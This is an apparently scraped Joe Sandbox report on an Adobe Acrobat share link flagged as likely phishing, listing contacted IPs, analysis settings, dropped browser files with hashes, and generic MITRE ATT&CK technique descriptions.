172.217.16.142	play.google.com	United States	15169	GOOGLEUS	false
204.79.197.237	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
34.104.35.123	unknown	United States	15169	GOOGLEUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
104.18.186.31	unknown	United States	13335	CLOUDFLARENETUS	false
74.125.133.84	unknown	United States	15169	GOOGLEUS	false
75.2.10.96	unknown	United States	16509	AMAZON-02US	false
151.101.193.138	unknown	United States	54113	FASTLYUS	false
142.250.185.238	unknown	United States	15169	GOOGLEUS	false
23.44.203.9	unknown	United States	20940	AKAMAI-ASN1EU	false
54.228.247.11	unknown	United States	16509	AMAZON-02US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.66.0.163	unknown	United States	13335	CLOUDFLARENETUS	false
142.250.185.195	unknown	United States	15169	GOOGLEUS	false
2.23.209.150	unknown	European Union	1273	CWVodafoneGroupPLCEU	false
18.213.11.84	unknown	United States	14618	AMAZON-AESUS	false
142.250.186.46	unknown	United States	15169	GOOGLEUS	false
184.51.148.186	unknown	United States	20940	AKAMAI-ASN1EU	false
23.57.90.111	unknown	United States	35994	AKAMAI-ASUS	false
3.165.190.7	prod.adobeccstatic.com	United States	16509	AMAZON-02US	false
52.22.41.97	unknown	United States	14618	AMAZON-AESUS	false
2.19.126.145	unknown	European Union	16625	AKAMAI-ASUS	false
23.44.201.201	unknown	United States	20940	AKAMAI-ASN1EU	false
104.17.30.92	widget.uservoice.com	United States	13335	CLOUDFLARENETUS	false
52.159.108.190	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
3.230.130.186	unknown	United States	14618	AMAZON-AESUS	false
172.64.41.3	unknown	United States	13335	CLOUDFLARENETUS	false
3.219.243.226	unknown	United States	14618	AMAZON-AESUS	false
142.250.110.84	unknown	United States	15169	GOOGLEUS	false
104.17.24.14	unknown	United States	13335	CLOUDFLARENETUS	false
151.101.129.138	cdn-sharing.adobecc.map.fastly.net	United States	54113	FASTLYUS	false
2.23.209.137	unknown	European Union	1273	CWVodafoneGroupPLCEU	false
172.67.141.195	unknown	United States	13335	CLOUDFLARENETUS	false
54.217.252.227	unknown	United States	16509	AMAZON-02US	false
34.199.101.34	unknown	United States	14618	AMAZON-AESUS	false
52.16.247.220	unknown	United States	16509	AMAZON-02US	false
142.250.181.227	unknown	United States	15169	GOOGLEUS	false
142.250.185.174	unknown	United States	15169	GOOGLEUS	false
52.85.49.7	unknown	United States	16509	AMAZON-02US	false
34.197.224.31	unknown	United States	14618	AMAZON-AESUS	false
23.204.152.170	unknown	United States	20940	AKAMAI-ASN1EU	false
34.120.195.249	o4505393339695104.ingest.us.sentry.io	United States	15169	GOOGLEUS	false
204.79.197.203	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
2.18.64.27	unknown	European Union	6057	AdministracionNacionaldeTelecomunicacionesUY	false
13.107.6.158	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
151.101.1.138	unknown	United States	54113	FASTLYUS	false
68.67.160.26	unknown	United States	29990	ASN-APPNEXUS	false
184.28.88.176	unknown	United States	16625	AKAMAI-ASUS	false
52.168.117.175	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
2.18.64.23	unknown	European Union	6057	AdministracionNacionaldeTelecomunicacionesUY	false
172.64.155.61	unknown	United States	13335	CLOUDFLARENETUS	false
157.240.241.35	unknown	United States	32934	FACEBOOKUS	false
50.16.47.176	unknown	United States	14618	AMAZON-AESUS	false
104.79.86.4	unknown	United States	16625	AKAMAI-ASUS	false
99.83.173.21	unknown	United States	16509	AMAZON-02US	false
13.107.5.80	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
54.224.241.105	unknown	United States	14618	AMAZON-AESUS	false
20.56.187.20	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.21.237	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
18.239.18.71	unknown	United States	16509	AMAZON-02US	false
13.107.21.239	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
2.23.209.40	unknown	European Union	1273	CWVodafoneGroupPLCEU	false
54.146.206.90	unknown	United States	14618	AMAZON-AESUS	false
107.23.241.177	unknown	United States	14618	AMAZON-AESUS	false
3.66.243.164	unknown	United States	16509	AMAZON-02US	false
18.65.39.7	unknown	United States	3	MIT-GATEWAYSUS	false
108.138.128.59	unknown	United States	16509	AMAZON-02US	false
13.107.42.16	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.42.14	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.73.254.179	unknown	United States	14618	AMAZON-AESUS	false
63.140.38.55	unknown	United States	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
40.74.166.188	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.185.74	unknown	United States	15169	GOOGLEUS	false
3.236.206.93	api.echosign.com	United States	14618	AMAZON-AESUS	false
18.239.18.116	unknown	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.16
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1486095
Start date and time:	2024-08-01 16:02:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.phis.win@86/366@78/658

Warnings

Exclude process from analysis (whitelisted): SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.195, 2.18.64.27, 2.18.64.31, 142.250.185.238, 64.233.167.84, 172.64.155.61, 104.18.32.195, 2.16.241.6, 2.16.241.12, 2.19.126.69, 2.19.126.77, 2.19.126.209, 2.19.126.206, 44.198.154.229, 34.199.101.34, 2.19.126.219, 2.19.126.211, 52.22.41.97, 3.219.243.226, 52.6.155.20, 3.233.129.217, 54.224.241.105, 50.16.47.176, 18.213.11.84, 34.237.241.83, 172.66.0.163, 162.159.140.165, 52.16.247.220, 52.51.28.236, 34.197.224.31, 3.230.130.186, 34.246.54.182, 54.228.247.11, 52.48.126.58, 95.101.111.170, 95.101.111.168, 34.104.35.123, 52.31.218.129, 52.48.8.54, 34.252.184.159, 184.28.89.29, 52.73.254.179, 52.54.121.245, 54.146.206.90, 44.205.200.174, 52.203.46.99, 52.0.61.224, 104.18.32.77, 172.64.155.179, 52.213.110.235, 79.125.71.5, 18.239.18.71, 18.239.18.98, 18.239.18.48, 18.239.18.41
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Skipping network analysis since amount of network traffic is too extensive
VT rate limit hit for: https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	49533
Entropy (8bit):	6.0956167063294115
Encrypted:	false
SSDEEP:
MD5:	0111789A341960E6950A0BBA86D32448
SHA1:	2165F93D8F5E03D93C942B911AD3C751EF343304
SHA-256:	AFC55D013C3EF5210454F82E2BDDDA2B6D9AE6C878C9D7712BE4B2557CD3DA22
SHA-512:	99BDED979B5A04ABB300ED6D97B4BDBFE76EB7B3F56C4ACD1C5174B6ED7ACF2B5888BA7B83EA1D686463984F728C21910D842F6FFE8DD62095C6E02B5A4E9439
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"7bb6c4b7-b76b-4866-a081-fa06bec4362f"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1722521006"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 1 13:02:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9725283800448303
Encrypted:	false
SSDEEP:
MD5:	3C768CC4292E6EEFB94D06FBC1B86008
SHA1:	F716AFE936CD2CF3537100B2F5649C3A9CEE27D2
SHA-256:	CAE55833C34CEF35AFEF7ACE252C61F596C98E27A311E470B9F41B2983B48D21
SHA-512:	0DCFD2A6C418943C19B891314558AF18AD6324C123C1045C2DFAFB1A512295425DC561A8CE2AE4FA7FF6A46ACC2572AFF29F4DCFE352C35890D413DE6D08522E
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....r.x....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YLp....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YSp....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YSp....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YSp..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YTp...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............hL.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token .
Tactics:	Initial Access
Data Sources:	Application Log: Application Log Content, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation
Platforms:	Linux, macOS, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Dropped Files

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Persistence and Installation Behavior

Boot Survival

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0ce9bc66-8cf9-4be2-9133-1a9ad2114455.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\14c65b56-0240-400c-a9d7-0c8ba323c5d3.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\76227b34-13ae-4a60-9ab1-71304119a55c.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9370a3a2-3a09-4f76-bfca-bdf434883c75.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\2e661771-3c31-472e-8ce7-3be520ac95e6.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-66AB959A-C98.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0eb602be-34d1-40a4-b174-3d2bb32cba72.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0eb66fab-842a-432c-9cf8-712830c283de.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\169a6604-86ad-4cb2-b796-28cb87f51379.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\750bac28-1a0a-4b2e-8ee6-33246dc8dc56.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_2

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_3

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\index

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Windows Analysis Report
https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12